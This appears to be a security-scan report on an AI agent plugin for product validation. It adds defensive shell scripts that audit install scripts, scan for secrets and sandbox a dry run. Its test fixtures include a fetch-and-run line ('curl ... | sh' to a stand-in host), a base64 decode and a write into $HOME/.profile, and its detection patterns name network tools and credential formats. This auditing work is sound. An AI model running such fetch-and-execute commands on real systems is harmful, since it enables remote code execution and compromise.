Plugin v1.0.0

ClawScan security

NPD Validator · ClawHub's context-aware review of the artifact, metadata, and declared behavior.

Scanner verdict

Benign · Apr 20, 2026, 9:30 PM
Verdict
benign
Confidence
high
Model
gpt-5-mini
Summary
The plugin's requirements, instructions, and files align with a multi‑agent product‑validation pipeline; nothing requests unrelated credentials or hidden network endpoints, but inspect the included install script and be mindful of the plugin's web access and file I/O.
Guidance
This plugin appears internally consistent with its stated purpose. Before installing or running it:
1. Review openclaw-install.sh. It creates workspace files on disk, so run it only in a safe, isolated directory.
2. Be aware that the agents perform many web searches, use WebFetch and SubAgent, and read and write data/*.md. Do not place secrets or unintended proprietary files in the plugin workspace.
3. The plugin does not request external credentials, but because it can autonomously spawn subagents and fetch web data, prefer running it in an environment without access to sensitive system-level files or hidden credentials.
4. If you need tighter controls, limit web access or run the skill in a sandboxed account or workspace.
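The first two points of the guidance, written out as an added example (this is not code from the plugin, from ClawHub, or from ClawScan): a static triage of an install script for network fetches, eval or base64 decoding, and writes outside the working tree, plus a scan of the data/ tree for secret-shaped strings before the agents get to read it. The install scripts and data files it creates are constructed stand-ins for the demonstration; the real openclaw-install.sh still has to be read in full, since pattern matching only narrows down where to look.

```shell
#!/bin/sh
# Added pre-flight checks for a plugin workspace laid out as the review
# describes: an install script (openclaw-install.sh) next to a data/ tree the
# agents read and write, including data/user_provided/. Example code, not part
# of the plugin or of ClawScan.

# Static triage of an install script. Flags lines that reach the network,
# eval or base64-decode hidden content, or copy/redirect output outside the
# working tree. Prints the flagged lines and returns 1 if there are any,
# 0 otherwise. A triage aid, not a proof: a script that passes is still read.
audit_install_script() {
    script="$1"
    flagged=$(grep -nE \
        -e '(^|[^[:alnum:]_])(curl|wget|nc|ncat|ssh|scp)[[:space:]]' \
        -e 'https?://' \
        -e '(^|[^[:alnum:]_])eval[[:space:]]' \
        -e 'base64[[:space:]]+(-d|--decode)' \
        -e '>>?[[:space:]]*(/(etc|usr|bin|root|var)/|~/|\$HOME/)' \
        -e '(cp|mv|install|tee)[[:space:]].*(~/|\$HOME/|[[:space:]]/(etc|usr|bin|root|var)/)' \
        "$script")
    if [ -n "$flagged" ]; then
        printf 'FLAGGED in %s:\n%s\n' "$script" "$flagged"
        return 1
    fi
    printf 'OK: %s has no network, eval/base64 or out-of-tree writes\n' "$script"
}

# Scan the files the agents will read for secret-shaped strings. Prints
# file:line only (never the matched value) and returns 1 if anything matched.
# Patterns: AWS access key ids, PEM private keys, GitHub tokens, key=value
# style credentials. Heuristic; extend it with your own credential formats.
scan_workspace_for_secrets() {
    dir="$1"
    hits=$(grep -rnEi \
        -e 'AKIA[0-9A-Z]{16}' \
        -e '-----BEGIN [A-Z ]*PRIVATE KEY-----' \
        -e 'gh[pousr]_[0-9A-Za-z]{36}' \
        -e '(api[_-]?key|secret|token|passw(or)?d)[[:space:]]*[:=][[:space:]]*[^[:space:]]{8,}' \
        "$dir" 2>/dev/null | cut -d: -f1,2)
    if [ -n "$hits" ]; then
        printf 'Possible secrets under %s (file:line):\n%s\n' "$dir" "$hits"
        return 1
    fi
    printf 'OK: no secret-shaped strings under %s\n' "$dir"
}

# Constructed sample inputs for the two checks (not files from the plugin).
make_sample_workspace() {
    root="$1"
    mkdir -p "$root/data/user_provided"
    # Stand-in for an install script that only seeds local workspace files.
    printf '%s\n' '#!/bin/sh' 'set -e' \
        'printf "# Soul\n" > SOUL.md' \
        'printf "# Agents\n" > AGENTS.md' \
        'printf "# Memory\n" > MEMORY.md' > "$root/openclaw-install.sh"
    # Stand-in for a script that pulls and runs remote content.
    printf '%s\n' '#!/bin/sh' \
        'curl -fsSL https://example.invalid/boot.sh | sh' \
        'echo aGk= | base64 -d' > "$root/suspicious-install.sh"
    # Ordinary research notes, and a user-provided file carrying a key id
    # (the AWS documentation example id, not a live credential).
    printf 'Competitor pricing: 12 USD/month\n' > "$root/data/market_notes.md"
    printf 'aws_access_key_id = AKIAIOSFODNN7EXAMPLE\n' \
        > "$root/data/user_provided/finance.md"
}

# Demo on the constructed workspace; the last two checks are expected to flag.
ws=$(mktemp -d)
make_sample_workspace "$ws"
audit_install_script "$ws/openclaw-install.sh"
audit_install_script "$ws/suspicious-install.sh" || true
scan_workspace_for_secrets "$ws/data" || true
```

Point `audit_install_script` at the real openclaw-install.sh and `scan_workspace_for_secrets` at the real data/ directory before the first run; the secret scan is worth repeating whenever new material is dropped into data/user_provided/, since that directory is read by the evaluators by design.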

Review Dimensions

Purpose & Capability
ok
The skill's name/description (multi-agent NPD validation) matches the included files and runtime instructions: multiple evaluator agent prompts, a consensus director, devil's advocate, and orchestrator SKILL.md. Declared requirements are minimal and proportional; web search/WebFetch and subagent behavior in the agent prompts are expected for market research and multi-agent orchestration.
Instruction Scope
note
The SKILL.md and agent files instruct agents to perform many web searches, read/write local workspace files (data/*.md), and produce evaluation artifacts, all consistent with the stated purpose. This also means the skill will access any user-provided data placed under data/user_provided/ (explicitly used by the Commercial Viability agent). That is reasonable for the task but is a potential privacy/exposure point: do not place highly sensitive secrets in the workspace unless you intend the plugin to use them.
Install Mechanism
note
There is no automated install spec (instruction-only), which is low risk. However, the repository includes openclaw-install.sh (9KB) which, if executed, writes workspace files (SOUL.md, AGENTS.md, MEMORY.md), copies agent prompts, and seeds memory. Review this script before running it; it will create files on disk in the target directory. No remote downloads, URL fetches, or obscure binaries are present in the manifest.
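A sandboxed dry run of an install script, added here as an example (not part of the plugin or of the scanner): the script is executed once in a throwaway directory with a throwaway HOME and an emptied environment, and the files it created are then compared against what the review says it should write (SOUL.md, AGENTS.md, MEMORY.md, copied agent prompts, seeded memory). The stand-in script, the agents/ subdirectory assumed for the copied prompts, and the deliberate write into $HOME/.profile are constructed for the demonstration so the report has something to show.

```shell
#!/bin/sh
# Added example (not part of the plugin or of ClawScan): run an install script
# once in a throwaway directory with a throwaway HOME and an emptied
# environment, then inventory what it created and compare that against the
# files the review expects. Isolation here covers the filesystem and the
# environment only; it does not block network access.

# Run SCRIPT in a fresh sandbox; print the sandbox path. The script's own
# output is discarded and its exit status ignored: we only care what it wrote.
run_install_sandboxed() {
    script="$1"
    sandbox=$(mktemp -d)
    mkdir -p "$sandbox/work" "$sandbox/home"
    cp "$script" "$sandbox/work/install.sh"
    ( cd "$sandbox/work" &&
      env -i HOME="$sandbox/home" PATH="$PATH" sh ./install.sh >/dev/null 2>&1 ) || :
    printf '%s\n' "$sandbox"
}

# Files created during the run, relative to the sandbox root, one per line,
# excluding the copied script itself.
created_files() {
    ( cd "$1" && find . -type f | sed 's#^\./##' | grep -v '^work/install\.sh$' | sort )
}

# Report every created file that is outside the workspace (i.e. under the fake
# HOME) or not matched by ALLOW, a space-separated list of shell patterns
# relative to work/. One line per finding; prints nothing when clean.
# The body runs in a subshell so that set -f (needed to keep patterns such as
# agents/*.md from globbing against the cwd) does not leak into the caller.
unexpected_files() (
    set -f
    sandbox="$1"; allow="$2"
    created_files "$sandbox" | while IFS= read -r f; do
        case "$f" in
            work/*)
                rel=${f#work/}
                for a in $allow; do
                    case "$rel" in $a) continue 2 ;; esac
                done
                printf 'UNEXPECTED workspace file: %s\n' "$rel" ;;
            *)
                printf 'WRITE OUTSIDE WORKSPACE: %s\n' "$f" ;;
        esac
    done
)

# Constructed stand-in for openclaw-install.sh: seeds the workspace files the
# review lists, puts a copied agent prompt under agents/ (an assumed layout),
# and makes one deliberate write into $HOME so the report has something to show.
make_sample_install_script() {
    cat > "$1" <<'EOF'
#!/bin/sh
set -e
mkdir -p agents
printf '# Soul\n' > SOUL.md
printf '# Agents\n' > AGENTS.md
printf '# Memory\n' > MEMORY.md
printf '# Evaluator prompt\n' > agents/evaluator.md
printf 'export CLAW_WORKSPACE=%s\n' "$PWD" >> "$HOME/.profile"
EOF
}

# Demo: the allow-list is the review's file list plus the assumed agents/
# prompts; the $HOME write is reported as WRITE OUTSIDE WORKSPACE.
tmp=$(mktemp -d)
make_sample_install_script "$tmp/openclaw-install.sh"
sb=$(run_install_sandboxed "$tmp/openclaw-install.sh")
created_files "$sb"
unexpected_files "$sb" 'SOUL.md AGENTS.md MEMORY.md agents/*.md'
```

Because the real script's HOME and working directory are both redirected into the sandbox, anything it tries to put in a dotfile or config directory turns up under home/ in the inventory instead of on the host. Network use is not constrained by this approach; if the script does fetch anything (the review says the manifest shows none), that has to be blocked with a network namespace, firewall rule, or an offline machine.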
Credentials
ok
The skill declares no required environment variables or credentials. The agent prompts request WebSearch/WebFetch/SubAgent tool usage, which is appropriate for web research. There are no unrelated credential or config path requests. Note: evaluators explicitly prefer and may read user-provided commercial data (data/user_provided/), which is necessary for accurate economics assessment; make sure sensitive business data is shared intentionally.
Persistence & Privilege
note
always:false (default) and disable-model-invocation:false (normal). The Consensus Director agent is allowed to spawn SubAgent operations and use WebFetch; that capability is coherent with a multi-agent pipeline but increases the plugin's operational blast radius if it runs autonomously. This is expected here, but you should be comfortable granting web access and subagent execution in the environment where you install it.